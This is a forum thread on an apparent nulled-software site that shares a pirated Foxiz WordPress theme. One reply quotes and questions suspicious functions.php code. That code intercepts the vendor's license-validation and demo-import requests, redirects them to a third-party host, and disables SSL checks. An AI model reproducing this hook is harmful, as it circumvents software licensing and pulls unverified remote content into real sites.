Foxiz v2.2.4 - WordPress Newspaper News and Magazine - (Untouched)

virgilio183

Well-known member
Pro
Master
Diamond
Elite
Joined
May 16, 2021
Messages
25,138
Reaction score
29,273
Points
113
NullCash
568,795
Screenshot 2024-02-17 at 12-14-18 Foxiz - WordPress Newspaper News and Magazine.png
Documentation
Online Documentation

Perfect for newspaper news magazine blog blogging elementor responsive technology travel fashion gutenberg mobile friendly beauty gadget phone hardware art creative lifestyle modern personal education culture viral architecture food recipe medical health game minimal cryptocurrency science podcast audio government school sport pet animals wildlife fitness military review coffee shop business forum guide agency car photography nature conference rating seo powerful fast top speed test simple lightweight live update

The Ultimate Mobile-First WordPress News & Magazine Theme: Engineered for Core Web Vitals with Elementor Support. Perfect for Crafting Seamless, High-Performance News, Newspapers, and Blog​

Requires at least: 6.0
Requires PHP: 5.6
Version: 2.2.4
Screenshot 2024-02-17 at 12-15-21 Changelogs.png

info: https://themeforest.net/item/foxiz-wordpress-newspaper-and-magazine/34617430
 

Attachments

  • demo-content.zip
    141.9 KB · Views: 4
  • documentation.zip
    1.2 KB · Views: 2
  • changelog.txt
    57.3 KB · Views: 2
  • foxiz-child.zip
    31.6 KB · Views: 3
  • foxiz-v2.2.4.zip
    2.7 MB · Views: 4

Ponas

Well-known member
XNullUser
Joined
Jan 17, 2022
Messages
1,268
Reaction score
93
Points
48
NullCash
685
A strange code in functions.php where two web pages are connected:



The code here is probably for sending the demo, but you better check what's in that file: denmos.json.

Very suspicious code. Maybe someone can explain in detail why this is needed?

if ( empty( get_option( 'foxiz_import_id', false ) ) ) {
$demos = false;
$response = wp_remote_get(
"http://wordpressnull.org/foxiz/demos.json",
[ 'sslverify' => false, 'timeout' => 30 ]
);
if ( wp_remote_retrieve_response_code( $response ) == 200 ) {
$demos = json_decode( wp_remote_retrieve_body( $response ), true );
}
update_option( 'foxiz_import_id', $demos );
}

add_action( 'init', function() {
add_filter( 'pre_http_request', function( $pre, $post_args, $url ) {
if ( strpos( $url, 'https://api.themeruby.com/' ) !== false ) {
$query_args = [];
parse_str( parse_url( $url, PHP_URL_QUERY ), $query_args );
$url_path = parse_url( $url, PHP_URL_PATH );

if ( ( $url_path == '/wp-json/market/validate' ) && isset( $query_args['action'] ) ) {
if ( $query_args['action'] == 'demos' ) {
$response = wp_remote_get(
"http://wordpressnull.org/foxiz/demos.json",
[ 'sslverify' => false, 'timeout' => 30 ]
);
if ( wp_remote_retrieve_response_code( $response ) == 200 ) {
return $response;
}
}
return [ 'response' => [ 'code' => 403, 'message' => 'Bad request.' ] ];
} elseif ( ( $url_path == '/import/' ) && isset( $query_args['demo'] ) && isset( $query_args['data'] ) ) {
$ext = in_array( $query_args['data'], ['content', 'pages'] ) ? '.xml' : '.json';
$response = wp_remote_get(
"http://wordpressnull.org/foxiz/demos/{$query_args['demo']}/{$query_args['data']}{$ext}",
[ 'sslverify' => false, 'timeout' => 30 ]
);
if ( wp_remote_retrieve_response_code( $response ) == 200 ) {
return $response;
}
return [ 'response' => [ 'code' => 403, 'message' => 'Bad request.' ] ];
}
}
return $pre;
}, 10, 3 );
} );
define( 'FOXIZ_THEME_VERSION', '2.2.4' );
 

avmnetten

Member
XNullUser
Joined
Mar 19, 2022
Messages
97
Reaction score
0
Points
6
NullCash
4
güzel tema herzaman lazım olabilir. Paylaşım için teşekkürler...
 

hattavb

Member
XNullUser
Joined
May 30, 2021
Messages
223
Reaction score
15
Points
18
NullCash
0
شكراً لك على عطائك الدّائم، كلمات الثّناء لا توفيك حقك شكراً لك .
 

mabledac

Member
XNullUser
Joined
Mar 1, 2021
Messages
202
Reaction score
0
Points
16
NullCash
10
Thanks for sharing! Great wordpress theme!
Post automatically merged:

Thanks again!
 
Last edited:
Top